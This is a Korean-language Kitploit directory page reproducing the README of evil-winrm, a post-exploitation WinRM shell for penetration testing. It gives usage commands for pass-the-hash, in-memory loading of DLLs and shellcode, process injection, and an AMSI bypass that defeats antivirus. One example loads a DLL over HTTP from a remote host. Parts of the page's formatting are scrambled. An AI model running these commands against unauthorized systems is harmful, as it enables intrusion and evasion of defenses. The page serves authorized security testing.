Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
evil-winrm — 해킹/침투 테스트를 위한 최고의 WinRM 셸 | Kitploit
도구/GitHubGitHub/hackplayers/evil-winrm
Payload GenerationExploitationPost-ExploitationPenetration TestingAuthenticationRemote Access Tool
GitHubhackplayers/evil-winrm

evil-winrm

해킹/침투 테스트를 위한 최고의 WinRM 셸

저장소 보기
5.4k68041일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Evil-WinRM Version-shield Ruby2.3-shield Gem-Version License-shield Docker-shield

해킹/펜테스트를 위한 최고의 WinRM 셸

Banner

설명 및 목적

이 셸은 해킹/펜테스트를 위한 최고의 WinRM 셸입니다.

WinRM(Windows Remote Management)은 WS-Management 프로토콜의 Microsoft 구현입니다. 서로 다른 공급업체의 하드웨어와 운영 체제가 상호 운용될 수 있도록 하는 표준 SOAP 기반 프로토콜입니다. Microsoft는 시스템 관리자의 업무를 더 쉽게 만들기 위해 자사 운영 체제에 이를 포함했습니다.

이 프로그램은 이 기능이 활성화된(일반적으로 포트 5985) 모든 Microsoft Windows Server에서 사용할 수 있으며, 물론 이를 사용할 자격 증명과 권한이 있는 경우에만 가능합니다. 따라서 이는 사후 침투 해킹/펜테스트 단계에서 사용될 수 있다고 말할 수 있습니다. 이 프로그램의 목적은 해킹에 유용하고 사용하기 쉬운 기능을 제공하는 것입니다. 시스템 관리자가 합법적인 목적으로도 사용할 수 있지만, 대부분의 기능은 해킹/펜테스트에 초점을 맞추고 있습니다.

주로 WinRM Ruby 라이브러리를 기반으로 하며, 버전 2.0부터 작동 방식이 변경되었습니다. 이제 WinRM 프로토콜을 사용하는 대신 PSRP(Powershell Remoting Protocol)를 사용하여 런스페이스 풀을 초기화하고 파이프라인을 생성 및 처리합니다.

기능

  • Linux 및 Windows 클라이언트 시스템과 호환
  • 메모리 내 Powershell 스크립트 로드
  • 일부 AV를 우회하는 메모리 내 dll 파일 로드
  • 일부 AV를 우회하는 메모리 내 C#(C Sharp) 어셈블리 로드
  • 멋진 donut 기술로 생성된 x64 페이로드 로드
  • AV 서명을 피하기 위한 동적 AMSI 우회
  • Pass-the-hash 지원
  • ccache 및 kirbi 파일을 포함한 Kerberos 인증 지원
  • SSL 및 인증서 지원
  • 진행률 표시줄과 함께 파일 업로드 및 다운로드
  • 권한 없이 원격 머신 서비스 나열
  • 명령 기록
  • WinRM 명령 완성
  • 로컬 파일/디렉터리 완성
  • 원격 경로(파일/디렉터리) 완성(선택적으로 비활성화 가능)
  • 프롬프트 및 출력 메시지 색상화(선택적으로 비활성화 가능)
  • 선택적 로깅 기능
  • Docker 지원(Dockerhub에서 사전 빌드된 이미지 제공)
  • Ctrl+C 시 우발적인 셸 종료를 방지하는 트랩 캡처
  • 합법적인 Windows 기본값을 사용하는 사용자 지정 user-agent
  • ETW(Event Tracing for Windows) 우회

도움말```

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [-K TICKET_FILE] [--spn SPN_PREFIX] [-l] -S, --ssl Enable ssl -c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate -k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate -r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com } -K, --ccache TICKET_FILE Path to Kerberos ticket file (ccache or kirbi format, auto-detected) -s, --scripts PS_SCRIPTS_PATH Powershell scripts local path --spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP) -e, --executables EXES_PATH C# executables local path -i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required) -U, --url URL Remote url endpoint (default /wsman) -u, --user USER Username (required if not using kerberos) -p, --password PASS Password -H, --hash HASH NTHash -P, --port PORT Remote host port (default 5985) -a, --user-agent Specify connection user-agent (default Microsoft WinRM Client) -V, --version Show version -n, --no-colors Disable colors -N, --no-rpath-completion Disable remote path completion -l, --log Log the WinRM session -h, --help Display this help message

root@kitploit:~
## 요구 사항
Ruby 2.3 이상이 필요합니다. 일부 ruby gem도 필요합니다: `winrm >=2.3.7`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`, `readline ~> 0.0.4`, `readline-ext ~> 0.2.0`.
설치 방법(4가지 가능)에 따라 이러한 항목을 수동으로 설치해야 할 수도 있습니다.

Kerberos 인증에만 사용되는 또 다른 중요한 요구 사항은 네트워크 인증에 사용되는 Kerberos 패키지를 설치하는 것입니다.
Debian 기반 Linux(Kali, Parrot 등)의 경우 `krb5-user`라고 합니다. BlackArch의 경우 `krb5`라고 하며, 다른 Linux 배포판에서는 다른 이름으로 불릴 수 있습니다.

원격 경로 자동 완성 기능은 네이티브 `readline-ext` 바인딩이 필요하며, 이는 Evil-WinRM 종속성으로 자동 설치됩니다. 일부 시스템에서는 이를 컴파일하기 위해 추가 개발 패키지가 필요합니다. 자세한 내용은 [아래 섹션](#Remote-path-completion)을 확인하세요.

## 설치 및 빠른 시작 (4가지 방법)

### 방법 1. ruby gem으로 직접 설치 (종속성은 시스템에 자동으로 설치됩니다)
 - 1단계. 설치합니다 (종속성이 자동으로 설치됩니다): ```gem install evil-winrm```
 - 2단계. 완료입니다. 바로 실행하세요!```
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

방법 2. Git clone 및 시스템에 수동으로 종속성 설치

  • 1단계. 종속성을 수동으로 설치: sudo gem install winrm winrm-fs stringio logger fileutils readline readline-ext
  • 2단계. 저장소를 clone: git clone https://github.com/Hackplayers/evil-winrm.git
  • 3단계. 준비 완료. 바로 실행하세요!``` cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
root@kitploit:~
### 방법 3. bundler 사용 (시스템에 의존성을 설치하지 않고 evil-winrm만 사용)
 - 1단계. bundler 설치: `gem install bundler`
 - 2단계. 저장소 복제: `git clone https://github.com/Hackplayers/evil-winrm.git`
 - 3단계. bundler로 의존성 설치: `cd evil-winrm && bundle install --path vendor/bundle`
 - 4단계. bundler로 실행:```
bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

방법 4. Docker 사용하기

  • 1단계. 이미 빌드된 이미지를 기반으로 Docker 컨테이너를 실행합니다:``` docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/ps1_scripts/' -e '/exe_files/'
root@kitploit:~
## 문서

### 일반 텍스트 비밀번호
비밀번호를 일반 텍스트로 입력하고 싶지 않다면, 선택적으로 `-p` 인자를 생략할 수 있으며, 그러면 비밀번호가 화면에 표시되지 않도록 프롬프트가 나타납니다.

### IPv6
IPv6을 사용하려면 주소를 /etc/hosts에 추가해야 합니다. `-i` 인자 뒤에 IP 주소 대신 이미 설정된 호스트 이름을 입력하면 됩니다.

### 기본 명령어
 - **upload**: 로컬 파일은 탭 키를 사용하여 자동 완성할 수 있습니다.
   - 사용법: `upload local_filename` 또는 `upload local_filename destination_filename`
 - **download**:
   - 사용법: `download remote_filename` 또는 `download remote_filename destination_filename`

 __경로에 대한 참고 사항 (upload/download)__:
   상대 경로는 download/upload에 사용할 수 없습니다. 현재 디렉터리의 파일 이름이나 절대 경로를 사용하세요.
   Docker 환경에서 Evil-WinRM을 사용하는 경우, 모든 로컬 경로는 `/data`에 있어야 하며, 다운로드한 파일에 접근하거나 로컬 호스트 OS에서 파일을 업로드할 수 있도록 해당 경로를 볼륨으로 매핑했는지 확인하세요.

 - **services**: 계정에 각 서비스에 대한 권한이 있는지 여부를 표시하며 모든 서비스를 나열합니다. 이 기능을 사용하는 데 관리자 권한은 필요하지 않습니다.
 - **menu**: 아래에서 설명할 `Invoke-Binary`, `Dll-Loader` 및 `Donut-Loader` 함수를 로드합니다. ps1이 로드되면 해당 함수가 모두 표시됩니다.
 - **clear** 또는 **cls**: 터미널 화면을 지웁니다. 화면을 지우려면 `Ctrl+L` 키보드 단축키를 사용할 수도 있습니다.
 - **exit** 또는 **quit**: Evil-WinRM 세션을 종료합니다. `Ctrl+D` 키보드 단축키를 사용할 수도 있습니다.```
*Evil-WinRM* PS C:\> menu

   ,.   (   .      )               "            ,.   (   .      )       .
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

          By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] clear
[+] cls
[+] menu
[+] exit

PowerShell 스크립트 로드

  • ps1 파일을 로드하려면 파일 이름을 입력하기만 하면 됩니다(Tab 키를 이용한 자동 완성 지원). 스크립트는 -s 인자에 설정된 경로에 있어야 합니다. menu를 다시 입력하면 로드된 함수들을 확인할 수 있습니다. 매우 큰 파일은 로드하는 데 오랜 시간이 걸릴 수 있습니다.``` Evil-WinRM PS C:> PowerView.ps1 Evil-WinRM PS C:> menu

    ,. ( . ) " ,. ( . ) . (" ( ) )' ,' ( ' (" ) )' ,' . ,) .; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( ".,,.).,) (..( .), ) , (...( '.."., . '.)(..,(".) ( ') _ / _|| | (( ( / \ / _| _ \ /
    | __)
    \ / / | | ;
    )') \ // / |/ | / / \ /
    | \ /| | |
    /
    / \ /| | | \ | / Y
    /
    _____ / _/ |__|
    / _/\ / ||| /__| /__| / / / / / /

    root@kitploit:~
       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
    

[+] Add-DomainAltSecurityIdentity [+] Add-DomainGroupMember [+] Add-DomainObjectAcl [+] Add-RemoteConnection [+] Add-Win32Type [+] Convert-ADName [+] Convert-DNSRecord [+] ConvertFrom-LDAPLogonHours [+] ConvertFrom-SID [+] ConvertFrom-UACValue [+] Convert-LDAPProperty [+] Convert-LogonHours [+] ConvertTo-SID [+] Dll-Loader [+] Donut-Loader [+] Export-PowerViewCSV [+] field [+] Find-DomainLocalGroupMember

root@kitploit:~
### 고급 명령어
- Invoke-Binary: .Net 어셈블리를 메모리에서 실행할 수 있게 해줍니다. 이름은 탭 키를 사용하여 자동 완성할 수 있습니다. exe 파일에 대한 인자는 쉼표로 구분하여 전달할 수 있습니다. 예: `Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'`. 실행 파일은 `-e` 인자에 설정된 경로에 있어야 합니다.```
*Evil-WinRM* PS C:\> Invoke-Binary
.SYNOPSIS
    Execute binaries from memory.
    PowerShell Function: Invoke-Binary
    Author: Luis Vacas (CyberVaca)

    Required dependencies: None
    Optional dependencies: None
.DESCRIPTION

.EXAMPLE
    Invoke-Binary /opt/csharp/Watson.exe
    Invoke-Binary /opt/csharp/Binary.exe param1,param2,param3
    Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'
    Description
    -----------
    Function that execute binaries from memory.

*Evil-WinRM* PS C:\> Invoke-Binary /opt/csharp/Rubeus.exe

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.0


 Ticket requests and renewals:


  • Dll-Loader: 메모리에서 dll 라이브러리를 로드할 수 있게 해주며, [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))와 동일합니다.

    dll 파일은 smb, http 또는 로컬에서 호스팅할 수 있습니다. 로드된 후에는 menu를 입력하면 모든 함수를 자동 완성할 수 있습니다.``` Evil-WinRM PS C:> Dll-Loader .SYNOPSIS dll loader. PowerShell Function: Dll-Loader Author: Hector de Armas (3v4Si0N)

    Required dependencies: None Optional dependencies: None .DESCRIPTION . .EXAMPLE Dll-Loader -smb -path \192.168.139.132\share\myDll.dll Dll-Loader -local -path C:\Users\Pepito\Desktop\myDll.dll Dll-Loader -http -path http://example.com/myDll.dll

    Description

    Function that loads an arbitrary dll

Evil-WinRM PS C:> Dll-Loader -http http://10.10.10.10/SharpSploit.dll [+] Reading dll by HTTP [+] Loading dll... Evil-WinRM PS C:\Users\test\Documents> menu

[... Snip ...]

Evil-WinRM PS C:> [SharpSploit.Enumeration.Host]::GetProcessList()

Pid : 0 Ppid : 0 Name : Idle Path : SessionID : 0 Owner : Architecture : x64

root@kitploit:~
- Donut-Loader: 멋진 [donut] 기법으로 생성된 x64 페이로드를 주입할 수 있게 해줍니다. payload.bin을 인코딩할 필요 없이 생성 후 주입만 하면 됩니다!```
*Evil-WinRM* PS C:\> Donut-Loader
.SYNOPSIS
    Donut Loader.
    PowerShell Function: Donut-Loader
    Author: Luis Vacas (CyberVaca)
    Based code: TheWover

    Required dependencies: None
    Optional dependencies: None
.DESCRIPTION

.EXAMPLE
    Donut-Loader -process_id 2195 -donutfile /home/cybervaca/donut.bin
    Donut-Loader -process_id (get-process notepad).id -donutfile /home/cybervaca/donut.bin

    Description
    -----------
    Function that loads an arbitrary donut :D

Windows를 사용하지 않는다면 이 donut-maker를 사용하여 payload.bin을 생성할 수 있습니다. 이 스크립트는 Marcello Salvati(byt3bl33d3r)가 작성한 Python 모듈을 사용합니다. pip로 설치할 수 있습니다: `pip3 install donut-shellcode```` python3 donut-maker.py -i Covenant.exe


.'/,-Y" "-. l.Y ^. /\ __ Donuts! i /" "
| /" "\ o ! l ] o !
./ \ _ _ .
__./ "

X / \ _./ ( \ . ..--" ~-. Z,-- /
__. ( / ______) \ l /-----
" / Y \ / | "x
.^ |
j Y

[+] Donut generated successfully: payload.bin

root@kitploit:~
- Bypass-4MSI: AMSI 보호를 패치합니다.```
*Evil-WinRM* PS C:\> #amsiscanbuffer
At line:1 char:1
+ #amsiscanbuffer
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
*Evil-WinRM* PS C:\>
*Evil-WinRM* PS C:\> Bypass-4MSI
[+] Success!

*Evil-WinRM* PS C:\> #amsiscanbuffer
*Evil-WinRM* PS C:\>

Kerberos

  • 먼저 DC와 날짜를 동기화해야 합니다: rdate -n <dc_ip>

  • 티켓을 생성하는 방법은 여러 가지가 있습니다:

    • impacket의 ticketer.py 사용
    • Rubeus 또는 Mimikatz를 사용하여 kirbi 티켓 획득 (ccache로의 자동 변환 지원)
  • 티켓 파일을 추가합니다. 3가지 방법이 있습니다:

    export KRB5CCNAME=/foo/var/ticket.ccache

    cp ticket.ccache /tmp/krb5cc_0

    -K 매개변수 사용: evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.ccache 또는 evil-winrm -i hostname -r DOMAIN.COM -K /path/to/ticket.kirbi

    -K 사용 시, 도구는 자동으로 다음을 수행합니다:

    • 티켓 형식 감지 (ccache 또는 kirbi)
    • 필요한 경우 kirbi 티켓을 ccache 형식으로 변환 (ticket_converter.py 또는 impacket-ticketConverter 필요)
    • 파일이 존재하고 읽을 수 있는지 검증
    • KRB5CCNAME 환경 변수 설정
    • 더 나은 Kerberos 호환성을 위해 IP 주소를 FQDN으로 변환
  • /etc/krb5.conf에 realm을 추가합니다 (linux의 경우). 다음 형식을 사용하는 것이 중요합니다: ``` CONTOSO.COM = { kdc = fooserver.contoso.com }

원격 경로 자동 완성

이 기능은 네이티브 readline-ext 바인딩이 필요합니다. Evil-WinRM은 이를 의존성으로 선언하므로 RubyGems 또는 Bundler를 사용할 때 자동으로 설치됩니다. 네이티브 확장을 빌드할 수 없으면 이 기능은 작동하지 않습니다(경고가 표시됩니다).

Ruby 3.3+ 참고: ext/readline은 Ruby 3.3에서 소스에서 제거되었습니다(Feature #19616). 따라서 아래의 방법 1은 Ruby 3.3 이상에서는 사용할 수 없습니다. Debian 계열 시스템에서는 Evil-WinRM 또는 해당 의존성을 설치하기 전에 필요한 개발 패키지를 설치하세요.``` sudo apt install libreadline-dev

root@kitploit:~
`readline-ext` 의존성은 `require 'readline'`이 `reline` 대신 GNU Readline을 로드하도록 만듭니다. `reline`에는 Evil-WinRM이 확인하는 메서드인 `quoting_detection_proc`가 없기 때문입니다. 아래 메서드들은 이전 Ruby 버전을 대상으로 하며 호환성을 위해 유지됩니다.

#### 메서드 1 (필요한 확장 컴파일)

이 메서드를 사용하면 시스템의 기본 Ruby 버전을 변경하지 않고 필요한 readline 기능만 사용하기 위해 Ruby를 컴파일하게 됩니다. 따라서 가장 권장되는 방법입니다.

Debian 기반 시스템에 Ruby 2.7.3이 설치되어 있다고 가정해 보겠습니다:```
# Install needed package
apt install libreadline-dev

# Check your ruby version
ruby --version
ruby 2.7.3p183 (2021-04-05 revision 6847ee089d) [x86_64-linux-gnu]

# Download ruby source code (2.7.3 in this case):
wget https://ftp.ruby-lang.org/pub/ruby/2.7/ruby-2.7.3.tar.gz

# Extract source code
tar -xf ruby-2.7.3.tar.gz

# Compile the readline extension:
cd ruby-2.7.3/ext/readline
ruby ./extconf.rb
make

# Patch current version of the ruby readline extension:
sudo cp /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so.bk
sudo cp -f readline.so /usr/lib/x86_64-linux-gnu/ruby/2.7.0/readline.so

방법 2 (evil-winrm 전용으로만 사용하기 위해 rbenv를 이용해 ruby 설치)

Debian 기반 Linux에서 ruby 2.7.1을 원하고 zsh을 사용한다고 가정해 봅시다. 이 스크립트가 이를 자동화해 줍니다. evil-winrm.rb와 Gemfile이 있는 동일한 디렉터리(예: git clone 후 생성된 evil-winrm 디렉터리)에서 실행해야 합니다:``` #!/usr/bin/env zsh

Uninstall possible current installed versions

sudo gem uninstall evil-winrm -q gem uninstall evil-winrm -q

Install rbenv

sudo apt install rbenv

Config rbenv on zshrc config file

echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.zshrc echo 'eval "$(rbenv init -)"' >> ~/.zshrc source ~/.zshrc

Install ruby with readline support

export RUBY_CONFIGURE_OPTS=--with-readline-dir="/usr/include/readline" rbenv install 2.7.1

Create file '.ruby-version' to set right ruby version

rbenv local 2.7.1

Install local gems

gem install bundler bundle install

current_evwr="$(pwd)/evil-winrm.rb"

sudo bash -c "cat << 'EOF' > /usr/bin/evil-winrm #!/usr/bin/env sh "${current_evwr}" "$@" EOF"

sudo chmod +x /usr/bin/evil-winrm

root@kitploit:~
그러면 새로 설치한 루비를 사용하여 필요한 readline 지원과 함께 어느 위치에서든 안전하게 evil-winrm을 실행할 수 있습니다.

#### 방법 3 (전체 루비 컴파일)

직접 컴파일하려면 다음 단계를 따르면 됩니다. 루비 2.7.3을 원한다고 가정해 보겠습니다:```
wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz
tar -xzvf ruby-install-0.8.1.tar.gz
cd ruby-install-0.8.1/
sudo make install
ruby-install ruby 2.7.3 -- --with-readline-dir=/usr/include/readline

시스템에 따라 /opt/rubies/ruby-2.7.3 또는 ~/.rubies/ruby-2.7.3에 설치됩니다.

이제 새로 설치된 해당 루비 버전에 대해 evil-winrm의 의존성을 설치하기만 하면 됩니다. 가장 쉬운 방법은 /opt/rubies/ruby-2.7.3/bin/gem install evil-winrm 명령을 실행하는 것입니다. 사용하는 gem 명령은 새 루비 설치에 속한 것이어야 합니다.

그 후, 새로 설치된 루비를 안전하게 실행하여 evil-winrm에 사용할 수 있습니다: /opt/rubies/ruby-2.7.3/bin/ruby ./evil-winrm.rb -h

이 새로 설치된 루비는 evil-winrm을 실행하는 데에만 사용하는 것이 좋습니다. 시스템의 기본 루비로 설정하는 경우, 의존성 gem이 설치되어 있지 않다는 점을 명심하세요. Metasploit과 같은 일부 루비 기반 소프트웨어는 의존성 문제로 인해 제대로 시작되지 않을 수 있습니다.

로깅

이 기능은 $HOME 디렉터리에 파일을 생성하여 WinRM 세션의 명령과 출력을 저장합니다.

명령 기록

Evil-WinRM은 각 호스트와 사용자 조합에 대해 영구적인 명령 기록을 유지합니다. 기록은 ~/.evil-winrm/history/ 디렉터리에 {host}_{user}.hist 형식의 파일 이름으로 저장됩니다.

이전에 접근한 적이 있는 시스템에 연결하면 화살표 키(위/아래)를 사용하여 이전 명령을 탐색할 수 있습니다. 기록은 각 명령 실행 후 자동으로 저장되며, 동일한 호스트에 동일한 사용자로 다시 연결할 때 로드됩니다.

알려진 문제. OpenSSL 오류

때때로 다음과 같은 오류가 발생할 수 있습니다:``` Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

root@kitploit:~
이 오류는 OpenSSL 3.0 버전이 이 도구를 실행하는 데 필요한 MD4와 같은 일부 레거시 함수를 제거했기 때문에 발생합니다. 이 상황을 해결하기 위한 기존의 다양한 해결 방법이 있습니다:

 - 시스템을 최신 버전으로 업데이트하세요. 최신 Ruby 버전에서 더 새로운 OpenSSL 버전을 사용하는 경우 이 문제가 자동으로 해결되었을 가능성이 높습니다.
 - OpenSSL 3.0 대신 이전 OpenSSL 1.x를 사용하여 자체 Ruby를 컴파일하거나, 문제가 있는 3.0 버전을 피하기 위해 OpenSSL > 3.0을 사용하여 컴파일하세요.
 - 가장 쉬운 방법입니다. `/etc/ssl/openssl.cnf` 구성 파일을 편집하고 구성이 다음과 같은지 확인하세요:```
openssl_conf = openssl_init

[openssl_init]
providers = provider_sect

[provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1
  • 마지막 해결 방법의 대안으로, 시스템이 OpenSSL 대신 LibreSSL을 사용하거나 시스템 구성 파일을 수정하고 싶지 않은 경우가 있을 수 있습니다. 위 내용이 포함된 간단한 파일을 생성하세요. 예를 들어 evil-tls.conf와 같이 어떤 이름이든 사용할 수 있습니다. 그런 다음 환경 변수를 내보내 시스템이 해당 파일을 사용하도록 강제합니다: export OPENSSL_CONF="/path/to/evil-tls.conf". 그런 다음 도구를 실행하면 오류가 사라집니다.

변경 로그:

변경 로그 및 프로젝트 변경 사항은 여기에서 확인할 수 있습니다: CHANGELOG.md

크레딧:

스태프:

  • Cybervaca, (창립자). Twitter (X): @CyberVaca_
  • OscarAkaElvis, Twitter (X): @OscarAkaElvis
  • Jarilaos, Twitter (X): @_Laox
  • arale61, Twitter (X): @arale61

특별 감사:

  • 개인적인 지원을 해준 Vis0r에게.
  • 원본 코드를 작성한 Alamot에게.
  • 훌륭한 dll 로더를 만든 3v4Si0N에게.
  • WinRb 루비 라이브러리의 모든 기여자에게.
  • 훌륭한 donut 도구를 만든 TheWover에게.
  • donut 페이로드를 생성하는 파이썬 라이브러리를 만든 byt3bl33d3r에게.
  • 새로운 기능에 대한 영감을 준 Sh11td0wn에게.
  • 로깅 기능 추가를 도와준 Borch에게.
  • 여러 Ruby 버전에서 도구를 유지 관리하는 데 도움을 준 noraj에게.
  • 이 소프트웨어를 자신의 github에 호스팅해 준 Hackplayers에게.

면책 조항 및 라이선스

이 스크립트는 LGPLv3+로 라이선스가 부여됩니다. 직접 링크: License.

Evil-WinRM은 승인된 침투 테스트 및/또는 비영리 교육 목적으로만 사용해야 합니다. 이 소프트웨어의 오용에 대한 책임은 작성자나 다른 협력자에게 있지 않습니다. 자신의 서버 및/또는 서버 소유자의 허가를 받아 사용하세요.

도구 다운로드
root@kitploit:~
  • Kerberos 티켓은 klist로 확인하세요.

  • 티켓을 제거하려면 kdestroy를 사용하세요.

  • Kerberos에 대한 자세한 내용은 이 [치트시트]를 확인하세요.